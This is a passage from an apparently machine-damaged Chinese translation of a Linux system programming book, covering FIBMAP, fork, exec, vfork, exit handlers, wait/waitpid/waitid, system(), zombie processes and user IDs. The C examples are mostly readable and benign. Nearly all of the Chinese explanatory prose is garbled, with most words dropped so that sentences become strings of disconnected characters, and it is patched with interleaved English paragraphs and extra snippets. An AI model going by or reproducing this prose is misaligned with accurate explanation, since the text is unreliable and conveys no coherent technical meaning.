        fd = open (argv[1], O_RDONLY);
        if (fd < 0) {
                perror ("open");
                return 1;
        }

        inode = get_inode (fd);
        printf ("%d\n", inode);

        return 0;
}
get inode() 以的的程。
inode : inode 文件的
理布。的的程程
Unix 上。何 inode 进空间 I/O
调的方。
理。理进的方设自的
。的文件小的单文件
。的小文件; 对理。以我
们以文件们对的理上进
。
内提文件理的方。 ioctl() 调
FIBMAP 我们将提
ret = ioctl (fd, FIBMAP, &block);
if (ret < 0)
        perror ("ioctl");
fd 文件的文件 block 我们理
的。调 block 理。 0
文件相。文件 8 效 0 7。
理的映射步。步文件的。
以 stat() 调。对我们 ioctl() 调
相的理。
以示程对的文件进相操作
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <linux/fs.h>

/*
 * get_block - for the file associated with the given fd, returns
 * the physical block mapping to logical_block
 */
int get_block (int fd, int logical_block)
{
        int ret;

        ret = ioctl (fd, FIBMAP, &logical_block);
        if (ret < 0) {
                perror ("ioctl");
                return -1;
        }

        return logical_block;
}

/*
 * get_nr_blocks - returns the number of logical blocks
 * consumed by the file associated with fd
 */
int get_nr_blocks (int fd)
{
        struct stat buf;
        int ret;

        ret = fstat (fd, &buf);
        if (ret < 0) {
                perror ("fstat");
                return -1;
        }

        return buf.st_blocks;
}

/*
 * print_blocks - for each logical block consumed by the file
 * associated with fd, prints to standard out the tuple
 * "(logical block, physical block)"
 */
void print_blocks (int fd)
{
        int nr_blocks, i;

        nr_blocks = get_nr_blocks (fd);
        if (nr_blocks < 0) {
                fprintf (stderr, "get_nr_blocks failed!\n");
                return;
        }

        if (nr_blocks == 0) {
                printf ("no allocated blocks\n");
                return;
        } else if (nr_blocks == 1)
                printf ("1 block\n\n");
        else
                printf ("%d blocks\n\n", nr_blocks);

        for (i = 0; i < nr_blocks; i++) {
                int phys_block;

                phys_block = get_block (fd, i);
                if (phys_block < 0) {
                        fprintf (stderr, "get_block failed!\n");
                        return;
                }
                if (!phys_block)
                        continue;

                printf ("(%u, %u) ", i, phys_block);
        }

        putchar ('\n');
}

int main (int argc, char *argv[])
{
        int fd;

        if (argc < 2) {
                fprintf (stderr, "usage: %s <file>\n", argv[0]);
                return 1;
        }

        fd = open (argv[1], O_RDONLY);
        if (fd < 0) {
                perror ("open");
                return 1;
        }

        print_blocks (fd);

        return 0;
}
文件的以 (的) 我们的
I/O 给文件的。以
get nr blocks() 的我们的程以 get block(fd, 0) 的进
。
FIBMAP 的 CAP SYS RAWIO 的 能 root 。
以 root 的程方。更进步 FIBMAP
的的实文件的。的文件 ext2 ext3
能的文件。 FIBMAP ioctl()
EINVAL。
方处文件的真实理真
的。即对同文件的 I/O (内 I/O 调
的 I/O 的)方。
的 root 对实的。
4.7 结论
In this chapter, we examined many facets of file I/O on Linux. We covered the basics of Linux file I/O — which are, in essence, the basics of Unix programming: read(), write(), open(), and close(). We then looked at the implementation of user-space buffering in the C library, advanced I/O such as the I/O schedulers, and the operation hints that help squeeze out better performance.

In the next chapter, we turn to process management: creating, destroying, and managing processes. Onward!
第 5 章
进程管理
提的进程 Unix 文件的。
的时进程、、
的。
将进程的。自的 Unix
的东。进程理 Unix 设
们的。进程的上 Unix 的处理
方将进程的新进离。然
的以更的对操作进
理。操作单的提调进程的
方式 Unix 提调 fork exec。我们
们进程的。
5.1 进程 ID
进程的示的即进程 ID pid。
时 pid 的。 t0 时进程的 pid
770(的进程的 pid 770 的 t1 时
进程的 pid 能 770。上设内
的 pid 设的相的。
空进程 (idle process)进程时内的进
程的 pid 0。内的进程 init 进程的 pid
1。 Linux init 进程 init 程。我们将init
示内的进程相的程。
式内的程(内的 init
内的 init 程的内的
子。 Linux 内以以进
1. /sbin/init init 能存的方。
2. /etc/init能的方。
3. /bin/init init 能存的。
4. /bin/sh Bourne shell 的的内 init 时内
。
以上的 init 。的
内出 panic。
内出 init 的程。的 init
进程。
5.1.1 分配进程 ID
内将进程 ID 的 32768。的 Unix
16 示进程的 ID。理以设
/proc/sys/kernel/pid max 的的性。
内进程 ID 以的性方式进的。 17 进程
id 的的 18 给新进程的即新进程时上
pid 17 的进程。内的 pid /proc/sys/ker-
nel/pid max内以的。 Linux 相
的段时间内同进程 ID 的性 Linux pid 的方式
内的 pid 的性。
5.1.2 进程体系
新进程的进程进程新进程子进程。进程
进程的( init 进程子进程进程。
存进程的进程 ID (ppid。
进程。属实
的。对内。 /etc/passwd /etc/group
文件映射们读的式。 Unix 对
root 、 wheel (内读的
更喜示们。子进程进程的。
进程进程的单的自进程
间的上的、的。子进程属进
程的进程。 shell (的
ls | less的同进程的。进程
相的进程间同的子进
程。的进程更。
5.1.3 pid t
程时进程 ID pid t 示的 <sys/types.h>
。的 C 相的何的 C
。 Linux C 的 int 。
5.1.4 获得进程 ID 和父进程的 ID
getpid() 调进程的 ID
#include <sys/types.h>
#include <unistd.h>
pid_t getpid (void);
getppid() 调进程的进程的 ID
#include <sys/types.h>
#include <unistd.h>
pid_t getppid (void);
调时的
printf ("My pid=%d\n", getpid ());
printf ("Parent's pid=%d\n", getppid ());
上我们何 pid t 的
单我们。 Linux 上我们设 pid t int
的的的能性的。的
C typedefs 的 pid t 的方式存
的。上我们 pid to int()
我们。对 printf() pid t 处理
的。
5.2 运行新进程
Unix 内存程映的操作新进程的操作
离的。 Unix 调(实上调以将进
文件的程映内存原进程的空间。
程新的程相的调 exec 调。
同时同的调新的进程上
进程。新的进程新的程。新进程的
(fork)能的调 fork() 。操作
fork即新的进程; 然即将新的进程
新的程。我们 exec 调然 fork()。
5.2.1 exec 系列系统调用
实单的 exec 调们单调的 exec
。我们单的 execl()
#include <unistd.h>
int execl (const char *path, const char *arg,
...);
对 execl() 的调将 path 的映内存进程的映
。 arg 的。的 execl()
(variadic的的。
以 NULL 的。
的 /bin/vi 的程
int ret;

ret = execl ("/bin/vi", "vi", NULL);
if (ret == -1)
        perror ("execl");
我们 Unix 的”vi” 作。 fork/exec
进程时 shell 的即”vi”新进程的
argv[0]。程以 argv[0]进映文件的
。工同的实上
同程的。以程的的
。
子 /home/kidd/hooks.txt以
int ret;

ret = execl ("/bin/vi", "vi", "/home/kidd/hooks.txt", NULL);
if (ret == -1)
        perror ("execl");
execl() 。的调以新的程的作
的存进程的空间的。
时 execl() -1设 errno 的示出的。我们
的 errno 的能。
execl() 的调空间进程的映进程的
属性
• 何的。
• 的何原的处理方式处理存
空间。
• 何内存的(。
• 程的属性原。
• 进程的。
• 进程内存相的何映射的文件。
• C 的性 ( atexit()) 存空间的
。
然进程的属性 pid、进程的 pid、、
属的。
的文件 exec 。新进程原进程
的文件的新的进程以原进程。然
理的处理方。以实操作 exec 调的文
件然以 fcntl( ) 内自。
5.2.1.1 其他 exec 系列系统调用
execl() 调
#include <unistd.h>
int execlp (const char *file, const char *arg,
...);
int execle (const char *path, const char *arg,
..., char * const envp[]);
int execv (const char *path, char *const argv[]);
int execvp (const char *file, char *const argv[]);
int execve (const char *filename, char *const
argv[], char *const envp[]);
单的。 l v 示以方式或
() 方式提的。 p 的 PATH 文
件。出的 p 的 exec 以单的提文件。
e 示提给新进程以新的。的上理
出 exec 同时以新的
。能 p 的 exec shell 的 shell 的进
程 shell 。
作作
的 exec 上。作以时
的。以 NULL 。
我们的子的段 execvp() vi
const char *args[] = { "vi", "/home/kidd/hooks.txt", NULL };
int ret;

ret = execvp ("vi", args);
if (ret == -1)
        perror ("execvp");
设 /bin 的工作方式上子相。
Linux 们真的调的 C
的。处理的调实的
存空间以 execve() 的。的原时
的。
5.2.1.2 错误返回值
调时 exec 调时 -1 errno 设
E2BIG
(arg或(envp的。
EACCESS
path 的的 path 的文件
文件文件的 path 或文件的文件
以 (noexec) 的方式。
EFAULT
给的效的。
EIO
I/O (的。
EISDIR
path 的或。
ELOOP
path 时的。
EMFILE
调进程的文件。
ENFILE
文件时(system-wide的。
ENOENT
或文件存或的存。
ENOEXEC 文件效的进文件或上
的式。
ENOMEM 内的内存新的程。
ENOTDIR path 的。
EPERM
path 或文件的文件 nosuid root
path 或文件设 suid 或 sgid 。
ETXTBSY 文件进程以写方式。
5.2.2 fork() 系统调用
进程映的进程以 fork() 调
#include <sys/types.h>
#include <unistd.h>
pid_t fork (void);
调 fork() 新的进程调 fork() 的进程
。进程调 fork() 的
。
新的进程原进程的子进程原进程自然进程。子进程
的 fork() 调 0。进程 fork() 子进程的 pid。
的方进程子进程间方相
• 然子进程的 pid 新的进程同的。
• 子进程的 ppid 设进程的 pid。
• 子进程的(Resource statistics零。
• 何的子进程(。
• 何文件子进程。
调出时子进程 fork() -1。同时设相的 errno 的
。 errno 的们能的
EAGAIN
内 时 新 的 pid或
RLIMIT NPROC 设的。
ENOMEM 的内内存满的操作。
pid_t pid;

pid = fork ();
if (pid > 0)
        printf ("I am the parent of pid=%d!\n", pid);
else if (!pid)
        printf ("I am the baby!\n");
else if (pid == -1)
        perror ("fork");
的 fork() 新的进程然进映
shell 新进程或进程进程。
(fork新的进程子进程新的进文件
的映。的方式的单的。的
子新的进程 /bin/windlass:
pid_t pid;

pid = fork ();
if (pid == -1)
        perror ("fork");

/* the child ... */
if (!pid) {
        const char *args[] = { "windlass", NULL };
        int ret;

        ret = execv ("/bin/windlass", args);
        if (ret == -1) {
                perror ("execv");
                exit (EXIT_FAILURE);
        }
}
子进程进程何的。 execv()
子进程 /bin/windlass。
5.2.2.1 写时复制
的 Unix 进程原。调 fork 时内
的内进程的页然进程的空间的
内页的子进程的空间。内页的方式
时的。
的 Unix 更的。的 Unix Linux
写时的方对进程空间进。
写时性方式时的。的
提单进程读们自的的
的。进程存的以。
进程自的” ”存的进程
。的。进程自的
的提给进程。的
对进程的。进程以的同时的进
程然的。以的写时进
。
写时的处进程进
。性的处们的操作的时
。
内存的, 写时(Copy-on-write以页进
的。以进程的空间空
间。 fork() 调进程子进程相们自的空
间实上们进程的原页页以的进程
或子进程。
写时内的实单。内页相的以
读写时。进程页页。内
处理页处理的方式对页进。时页的
COW 属性示。
的内存理单(MMU提件的写
时以实的。
调 fork() 时写时的。的 fork
exec进程空间的内子进程的空间
时间子进程新的进文件的映
的空间出。写时以对进。
5.2.2.2 vfork
实写时 Unix 的设们 fork
exec 的空间的。 BSD 的们 3.0 的 BSD
vfork() 调。
#include <sys/types.h>
#include <unistd.h>
pid_t vfork (void);
子进程对 exec 的调或调 exit()
出(将的进对 vfork() 的调的 fork()
的。 vfork() 进程子进程或新的
文件的映。方式 vfork() 空间的页。程
进程子进程相同的空间页 (写时)。实上
vfork() 件内的内。子进程能
空间的何内存。
vfork() Linux 实。的即
写 时 vfork() fork() 进 页 的
。∗然写时的出对 fork() 。实上 2.2.0 内
vfork() 的 fork()。对 vfork() 的小 fork()以
vfork() 的实方式的。的 vfork() 的实
的 exec 调时的子进程或
出进程将。
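The constraints above can be seen in a minimal, safe use of vfork(): the child does nothing but exec or _exit(). In this sketch, spawn_true is an illustrative helper name, and /bin/true is assumed to exist, as it does on essentially all Linux systems:

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run /bin/true via vfork()+exec and return its exit status, or -1
 * on error. The child must call only exec or _exit(), because it
 * borrows the parent's address space until it does. */
int spawn_true (void)
{
        int status;
        pid_t pid;

        pid = vfork ();
        if (pid == -1)
                return -1;

        if (pid == 0) {
                execl ("/bin/true", "true", (char *) NULL);
                _exit (127);    /* exec failed; never call exit() here */
        }

        if (waitpid (pid, &status, 0) == -1)
                return -1;
        return WIFEXITED (status) ? WEXITSTATUS (status) : -1;
}
```

Note the use of _exit() rather than exit() on exec failure: flushing the parent's stdio buffers from the child would corrupt the shared address space.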
5.3 终止进程
POSIX C89 进程的
#include <stdlib.h>
void exit (int status);
对 exit() 的调的进程的步然内
进程。实上。
理 exit() 何的。
status 示进程出的。进程 shell 的
以。 status & 0377 给进程。我们
。
EXIT SUCCESS EXIT FAILURE 示
的。 Linux 0 示零 1 或 -1示。
进程的出时单的写上
exit (EXIT_SUCCESS);
进程 C 以进程的工作
1. 以的调 atexit() 或 on exit() 的(我们
。
∗Linux Kernel Mailing List(lkml出页的写时的
2.6 内。进内 vfork() 何处的。
2. 空的 I/O 。
3. tmpfile() 的时文件。
步空间的 exit() 以调 exit(
) 内处理进程的工作
#include <unistd.h>
void _exit (int status);
进程出时内理进程的、的何。
(的内存、的文件 System V 的
。理内进程进程子进程的。
程以调 exit()的的程
出程的理工作空 stdout 。 vfork()
的进程时 exit() exit()。
相段时间 ISO C99 Exit()
的能 exit() 的
#include <stdlib.h>
void _Exit (int status);
5.3.1 其他终止进程的方式
进程的方式的调
程处的方式。 C main() 时。然
方式然进调单的的
exit()。 main() 时给出或调 exit()
的程。 shell 的。
时的 exit(0)或 main() 0。
进程对的处理进程进程
。的 SIGTERM SIGKILL(。
进程内性的。内
段或内存的进程。
5.3.2 atexit()
POSIX 1003.1-2001 Linux 实。 atexit()
进程时调的
#include <stdlib.h>
int atexit (void (*function)(void));
对 atexit() 的调的进程(进程
以调 exit() 或 main() 的方式自时调的。进程
调 exec的(存新进程的
空间。进程的的调。
的的。的原
void my_function (void);
调的的相的。存以
进出的方式调(LIFO。的能调 exit()的
调。提进程调 exit()。
的的调。
POSIX atexit() ATEXIT MAX
32。的以 sysconf( ) SC ATEXIT MAX
long atexit_max;
atexit_max = sysconf (_SC_ATEXIT_MAX);
printf (”atexit_max=%ld\n”, atexit_max);
时 atexit() 0。时 -1。
单的子
#include <stdio.h>
#include <stdlib.h>

void out (void)
{
        printf ("atexit() succeeded!\n");
}

int main (void)
{
        if (atexit (out))
                fprintf (stderr, "atexit() failed!\n");
        return 0;
}
5.3.3 on exit( )
SunOS 4 自的 atexit() 的 on exit() Linux 的 glibc 提
对的
#include <stdlib.h>
int on_exit (void (*function)(int , void *), void
*arg);
的工作方式 atexit() 的原同
void my_function (int status, void *arg);
status 给 exit() 的或 main() 的。 arg 给 on exit
() 的。小的调时 arg 的内存
效的。
Newer versions of Solaris, however, no longer support on_exit(); portable programs should use the standard atexit() instead.
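As a sketch of the difference from atexit(), the handler below receives both the exit status and a caller-supplied pointer. The wrapper name register_report is our own; on_exit() itself is a glibc/SunOS extension:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* on_exit() handlers receive the exit status plus an arbitrary
 * pointer; the pointed-to memory must remain valid until exit. */
static void report (int status, void *arg)
{
        fprintf (stderr, "%s: exiting with status %d\n",
                 (const char *) arg, status);
}

/* Register the handler; returns 0 on success, nonzero on failure. */
int register_report (const char *name)
{
        return on_exit (report, (void *) name);
}
```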
5.3.4 SIGCHLD
进程子进程时内进程 SIGCHILD 。
进程何的作。进程 signal() 或
sigaction() 调的处理。调处理的
。
SIGCHILD 能何时何时给进
程。子进程的进程异步的。进程能
更的子进程的或式的子进程的。相
的调。
5.4 等待终止的子进程
进程以的的进程子进程的
更子进程的。
程子进程给进程何以
子进程的东。以 Unix 的设们出的子进
程进程内子进程设的。处
的进程(zombie进程。进程小的存
的内。的进程进程自的(
进程上。进程子进程的子进程
。
Linux 内提的子进程的。单的
wait() POSIX
#include <sys/types.h>
#include <sys/wait.h>
pid_t wait (int *status);
wait() 子进程的 pid或 -1 示出。子进程
调子进程。子进程
的。相子进程的 wait() 调( SIGCHILD
以的方式。
时 errno 能的
ECHILD 调进程何子进程。
EINTR
子进程时 wait() 提。
status NULL子进程的。
POSIX 实时以 status 的 bit 示。 POSIX
提
#include <sys/wait.h>
int WIFEXITED (status);
int WIFSIGNALED (status);
int WIFSTOPPED (status);
int WIFCONTINUED (status);
int WEXITSTATUS (status);
int WTERMSIG (status);
int WSTOPSIG (status);
int WCOREDUMP (status);
子进程的能真(零。
进程进程调 exit( ) WIFEXITED
真。 WEXITSTATUS 给 exit( ) 的。
( 对 的 进 程 的 WIFSIG-
NALED 真。 WTERMSIG 进程的的
。进程时存 (dumped core) WCOREDUMP
true。 WCOREDUMP POSIX Unix
Linux 。
子进程或 WIFSTOPPED WIFCONTINUED
真。 ptrace() 调的。实调时
。 waitpid()(的们以实
作业。 wait() 子进程的。 WIFSTOPPED
真 WSTOPSIG 进程的的。然 POSIX
WIFCONTINUED新的 waitpid()。 2.6.10 内
Linux wait() 提。
我们 wait() 子进程的
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>

int main (void)
{
        int status;
        pid_t pid;

        if (!fork ())
                return 1;

        pid = wait (&status);
        if (pid == -1)
                perror ("wait");
        printf ("pid=%d\n", pid);

        if (WIFEXITED (status))
                printf ("Normal termination with exit status=%d\n",
                        WEXITSTATUS (status));
        if (WIFSIGNALED (status))
                printf ("Killed by signal=%d%s\n", WTERMSIG (status),
                        WCOREDUMP (status) ? " (dumped core)" : "");
        if (WIFSTOPPED (status))
                printf ("Stopped by signal=%d\n", WSTOPSIG (status));
        if (WIFCONTINUED (status))
                printf ("Continued\n");

        return 0;
}
程子进程出。进程调
wait() 子进程的。进程出子进程的 pid 以及。
子子进程的 main() 以以的出
$ ./wait
pid=8529
Normal termination with exit status=1
子进程的 main() 调 abort()( <stdlib.h>
子进程自 SIGABRT 我们
的将的出
$ ./wait
pid=8678
Killed by signal=6
5.4.1 等待特定进程
子进程的的。进程能子进程
子进程的进程的子进程。
方式调 wait()的进程。
的设子进程的
进程存 wait() 的以备将。
进程的 pid以 waitpid() 调
#include <sys/types.h>
#include <sys/wait.h>
pid_t waitpid (pid_t pid, int *status, int
options);
wait() waitpid() 更的调。的以
调。
pid 的或进程的 pid。的
< -1 的子进程们的 ID pid 的绝对。 -500
示进程 500 的子进程。
-1
子进程 wait() 效。
0
调进程处同进程的进程。
>0
进程 pid 的子进程。 500 示 pid 500
的子进程。
status 的作 wait() 的的的
以的。
options 零或进或的
WNOHANG
的子进程或或处
的 waitpid() 。
WUNTRACED
设 即 调 进 程 子 进 程 WIF-
STOPPED 设。以实更的
作业 shell。
WCONTINUED 设即调进程子进程 WIFCON-
TINUED 设。 WUNTRACED 对
shell 的实的。
调时 waitpid() 进程的 pid。设
WNOHANG 的(进程的
0。时 -1 errno 的的
ECHILD pid 的进程存或调的子进程。
EINTR
设 WNOHANG程。
EINVAL options 。
作子设的程 pid 1742 的子进程的
子进程, 进程。写出的
int status;
pid_t pid;

pid = waitpid (1742, &status, WNOHANG);
if (pid == -1)
        perror ("waitpid");
else {
        printf ("pid=%d\n", pid);
        if (WIFEXITED (status))
                printf ("Normal termination with exit status=%d\n",
                        WEXITSTATUS (status));
        if (WIFSIGNALED (status))
                printf ("Killed by signal=%d%s\n", WTERMSIG (status),
                        WCOREDUMP (status) ? " (dumped core)" : "");
}
作子 wait() 的
wait (&status);
waitpid() 的
waitpid (-1, &status, 0);
5.4.2 其他等待子进程的方法
作程们更子进程的方式。 XSI 扩展
POSIX Linux 提 waitid():
#include <sys/wait.h>
int waitid (idtype_t idtype, id_t id, siginfo_t
*infop, int options);
wait() waitpid() , waitid() 作子进程的子进程
的(、或。更的以
性的。
waitpid() waitid() 程的子进程。
工作 waitid() 。 idtype id
的子进程 waitpid() 的 pid 的作。 idtype 的
的
P PID
pid id 的子进程。
P GID 进程 ID id 子进程。
P ALL 子进程 id 。
id 的 id t 的 ID 。将
能 idtype 的以。新的 idtype 以
进。 id t 的以存何的 pid t 。 Linux
上以 pid t pid t 的给或
性的。程上的。
options 以或进进” 或” 的
WEXITED
调进程的子进程( id idtyp 。
WSTOPPED
调进程的子进程。
WCONTINUED 调进程的子进程。
WNOHANG
调进程子进程(或
。
WNOWAIT
调进程满件的子进程的。调进程
能将。
时 waitid() infop效的 siginfo t
。 siginfo t 的实相的。∗
waitpid() 调效的。的调的
si pid
子进程的 pid
si uid
子进程的 uid
si code
子 进 程 的 、 、 或
设 CLD EXITED、 CLD KILLED、 CLD STOPPED 或
CLD CONTINUED 的。
si signo 设 SIGCHLD。
si status si code CLD EXITED子进程的出。
的的。
时 waitid() 0。时 -1。 errno 设
ECHLD id idtype 的进程存。
EINTR
子进程的 options 设 WNO-
HANG。
EINVAL options 或 id idtyp 的。
waitid() 提 wait() waitpid() 更的。以 siginfo t
的的。更
单的以更的以更更的
Linux 的上。
5.4.3 BSD 中的 wait3() 和 wait4()
waitpid() AT&T 的 System V Release 4 的同时 BSD 自的方
提子进程的
#include <sys/types.h>
* Actually, the siginfo_t structure is quite a bit more complicated on Linux. For its definition, see /usr/include/bits/siginfo.h. We will discuss more of this structure in Chapter 9.
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
pid_t wait3 (int *status, int options, struct
rusage *rusage);
pid_t wait4 (pid_t pid, int *status, int options,
struct rusage *rusage);
3 4 实上。
rusage 的工作方式 waitpid() 对
wait3() 的调
pid = wait3 (status, options, NULL);
的 waitpid() 调
pid = waitpid (-1, status, options);
对 wait4() 的调
pid = wait4 (pid, status, options, NULL);
的 waitpid() 调
pid = waitpid (pid, status, options);
wait3() 何子进程 wait4() pid 的子
进程。 options 的作 waitpid() 的。
提调的同 rsuage 。 rsuage
空的 rsuage 上子进程相的。
提子进程的
#include <sys/resource.h>

struct rusage {
        struct timeval ru_utime;  /* user time consumed */
        struct timeval ru_stime;  /* system time consumed */
        long ru_maxrss;           /* maximum resident set size */
        long ru_ixrss;            /* shared memory size */
        long ru_idrss;            /* unshared data size */
        long ru_isrss;            /* unshared stack size */
        long ru_minflt;           /* page reclaims */
        long ru_majflt;           /* page faults */
        long ru_nswap;            /* swap operations */
        long ru_inblock;          /* block input operations */
        long ru_oublock;          /* block output operations */
        long ru_msgsnd;           /* messages sent */
        long ru_msgrcv;           /* messages received */
        long ru_nsignals;         /* signals received */
        long ru_nvcsw;            /* voluntary context switches */
        long ru_nivcsw;           /* involuntary context switches */
};
我们。
调时 0。时 -1。 errno 设 waitpid()
的。
wait3() and wait4() are not defined by POSIX,* and thus they should be used only when the resource-usage information is truly needed. Despite the lack of POSIX standardization, however, nearly every Unix system supports these calls.
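For instance, a parent can measure a child's resource consumption via the rusage argument. A sketch follows; child_max_rss is our own helper name, and on Linux ru_maxrss is reported in kilobytes:

```c
#include <assert.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a trivial child, reap it with wait4(), and return its peak
 * resident set size as reported in struct rusage, or -1 on error. */
long child_max_rss (void)
{
        struct rusage ru;
        pid_t pid;

        pid = fork ();
        if (pid == -1)
                return -1;
        if (pid == 0)
                _exit (EXIT_SUCCESS);

        if (wait4 (pid, NULL, 0, &ru) != pid)
                return -1;

        return ru.ru_maxrss;
}
```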
5.4.4 创建并等待一个新进程
ANSI POSIX 新进程的
以同步的进程。进程新进程然
的的
* Technically, wait3() is part of the Single UNIX Specification.
#define _XOPEN_SOURCE
/* if we want
WEXITSTATUS, etc. */
#include <stdlib.h>
int system (const char *command);
system() 以进程同步” 给
”。 system() 单的工程或 shell 的
工程或的。
对 system() 的调 command 的程的
程以以相的。”/bin/sh –c” 作 command
。将给 shell。
时的同 wait() 的。
的 WEXITSTATUS 。对 /bin/sh 自的调
WEXITSTATUS 的调 exit(127) 的
的。能调的 127 shell 自
的 127。 system() 调时 -1。
command NULL /bin/sh 的 system() 零的
0。
的 程 SIGCHILD 的 SIGINT
SIGQUIT 。实对 SIGINT SIGQUIT 的实
方式 system() 调的时。调
system()子进程的出。
do {
        int ret;

        ret = system ("pidof rudderd");
        if (WIFSIGNALED (ret) &&
            (WTERMSIG (ret) == SIGINT || WTERMSIG (ret) == SIGQUIT))
                break; /* or otherwise handle */
} while (1);
fork()、 exec 调 waitpid() 实 system() 的
。自的。性
单的实
/*
 * my_system - synchronously spawns and waits for the command
 * "/bin/sh -c <cmd>".
 *
 * Returns -1 on error of any sort, or the exit code from the
 * launched process. Does not block or ignore any signals.
 */
int my_system (const char *cmd)
{
        int status;
        pid_t pid;

        pid = fork ();
        if (pid == -1)
                return -1;
        else if (pid == 0) {
                const char *argv[4];

                argv[0] = "sh";
                argv[1] = "-c";
                argv[2] = cmd;
                argv[3] = NULL;
                execv ("/bin/sh", argv);

                exit (-1);
        }

        if (waitpid (pid, &status, 0) == -1)
                return -1;
        else if (WIFEXITED (status))
                return WEXITSTATUS (status);

        return -1;
}
子式的 system()或何。
程的能能。 SIGINT
的以的时的。
的实以将的空时同的
。能 fork failed shell failed。
5.4.5 僵死进程
提的进程的进程
进程进程。进程
进程的。的
进程子进程的时提相的。进程
的内的进程存。
然何 Unix 的或或的进程。进
程进程 (ghosts)进程相的进程。的进程
子进程子进程(的周
即的子进程的。的子进程
进程存。们的进程的程
.
然进程子进程或进程
的子进程何时进程内
的子进程们的进程新设 init 进程(pid 1 的
进程。存进程的进程。 init 进程周性的
子进程时间存的进程进程。进
程子进程或出子进程 init 进程
子进程的进程们的出。的处
理方式周的进程的子进
程。
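为了让进程表里不积累僵死进程，父进程可以在不阻塞的情况下收割所有已退出的子进程。下面是这个常见套路的一个示意（函数名为笔者所取，通常把这个循环放进 SIGCHLD 处理函数中）：

```c
#define _GNU_SOURCE
#include <sys/wait.h>
#include <unistd.h>

/* Reap all terminated children without blocking; returns the
 * number of zombies collected. WNOHANG makes waitpid() return 0
 * instead of blocking when no child has exited yet. */
int reap_zombies (void)
{
        int reaped = 0;

        while (waitpid (-1, NULL, WNOHANG) > 0)
                reaped++;
        return reaped;
}
```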
5.5 用户和组
的进程相的。
ID ID C 的 uid t gid t 示。示读
间的映射( root 的 uid 0空间的 /etc/passwd
/etc/group 文件的。内处理示的式。
Linux 进程的 ID ID 进程以操
作。进程以的。的进程以 root 的。然
的方式小的原进程的以小
的。的进程以 root 的
root 能的 root
。进程 root 操作时
操作自的 ID 或 ID。
我们何实我们 ID ID 的
性。
5.5.1 实际用户 (组)ID、有效用户 (组)ID 和保存设置的用户 (组)ID
的集 ID 上 ID 的的。
实上进程相的 ID 们
实 ID、效 ID、存设的 ID 文件
ID。实 ID 进程的的 uid。
的 uid 设进程的实 ID exec
调。进程将的 shell 的实
ID 设的 ID进程的实 ID
。超(root能实 ID 的
能的。
效 ID 进程的 ID。。
时 ID 实 ID。进程时子进程进程的效
ID。更进步的 exec 调效 ID。 exec 调
程实 ID 效 ID 的出 setuid (suid) 程
进程以自的效 ID。的效 ID 设
程文件的 ID。 /usr/bin/passwd setuid 文件的
root 。进程
进程的效 ID root 的 ID。
能效 ID 设实 ID 或存
设的 ID。超以效 ID 设何。
存设的 ID 进程原的效 ID。进程时子进程
进程存设的 ID。对 exec 调内存设的
ID 设效 ID exex 调程存效
ID 的。能存设的 ID 的超以设
实 ID 的。
的 ID 效 ID 的作进程
程的 ID。实 ID 存设的 ID 理或
的 ID 的作 root 进程 ID 间相。实
ID 真程的效 id。存设的 ID suid 程
的效 id。
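进程可以通过 Linux 特有的 getresuid() 调用一次取得这三个用户 ID。下面的示意代码（非原书内容，函数名为笔者所取）用它判断程序是否以 setuid 方式运行：

```c
#define _GNU_SOURCE
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if the process runs with an effective UID that
 * differs from its real UID (i.e., a setuid binary), 0 if not,
 * and -1 on error. */
int is_setuid_process (void)
{
        uid_t ruid, euid, suid;

        if (getresuid (&ruid, &euid, &suid) == -1)
                return -1;
        return ruid != euid;
}
```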
5.5.2 改变实际用户 (组)ID 和保存设置的用户 (组)ID
ID ID 调设的
#include <sys/types.h>
#include <unistd.h>
int setuid (uid_t uid);
int setgid (gid_t gid);
setuid() 设进程的效 ID。进程的效 ID
0(root实 ID 存设的 ID 的同时设。 root
以 uid 提何将 ID 的设 uid。 root
将实 ID 存设的 ID 设 uid。 root
能将效 ID 设上的。
调时 setuid() 0。时 -1 errno 设的
EAGAIN uid 的实 ID 的同实 ID 的的 uid
超 NPROC 的(以的进程
。
EPERM
root uid 效 ID 存设的 ID。
的对然的将 setuid() setgid() uid
gid。
5.5.3 改变有效用户和组 ID
Linux 提 POSIX 的进程的效 id
ID 的
#include <sys/types.h>
#include <unistd.h>
int seteuid (uid_t euid);
int setegid (gid_t egid);
setuid() 的调将效 ID 的设 euid。 root 以 euid 提
何。 root 能将效 ID 设效 ID 或存设的
ID。时 setuid() 0时 -1 errno 设 EPERM。
示进程的 root euid 的实 ID
存设的 ID。
对 root seteuid() setuid() 的。以
seteuid() 的。的进程以 root setuid()
更。
的对然的将 seteuid() setegid() euid
egid。
5.5.4 BSD 改变用户 ID 和组 ID 的方式
BSD ID ID 上自的。出性 Linux
提
#include <sys/types.h>
#include <unistd.h>
int setreuid (uid_t ruid, uid_t euid);
int setregid (gid_t rgid, gid_t egid);
调 setreuid() 将实 ID 效 ID 设 ruid
euid。将的何设 -1 示相的 ID。
root 将效 ID 设实 ID 或存设的 ID
实 ID 设效 ID。实 ID 或效
ID 设的实 ID 的或存设的 ID 设
新的效 ID Linux 或 Unix 自
的。 POSIX 的。
时 setreuid() 0时 -1 errno 设 EPERM。
示进程的 root euid 的即实 ID
存设的 ID或 ruid 效 ID。
的对然的将 setreuid() setregid()
ruid rgid euid egid。
5.5.5 HP-UX 中改变用户 ID 和组 ID 的方式
能式 HP-UX(Hewlett-Packard s Unix
) 自设 ID ID 的方式。 Linux 同提
#define _GNU_SOURCE
#include <unistd.h>
int setresuid (uid_t ruid, uid_t euid, uid_t
suid);
int setresgid (gid_t rgid, gid_t egid, gid_t
sgid);
调 setresuid() 将实 ID、效 ID 存设的 ID
设 ruid、 euid suid。将的何设 -1 示
相的 ID。
root 以何 ID 设何。 root 以
ID 设的实 ID、效 ID 存设的 ID。时
setresuid()(原文 0时 0 errno 设
EAGAIN uid 的实 ID 的同实 ID 的 uid
超 NPROC 的(以的进程
。
EPERM
root 设的新的实 ID、效 ID 或存设
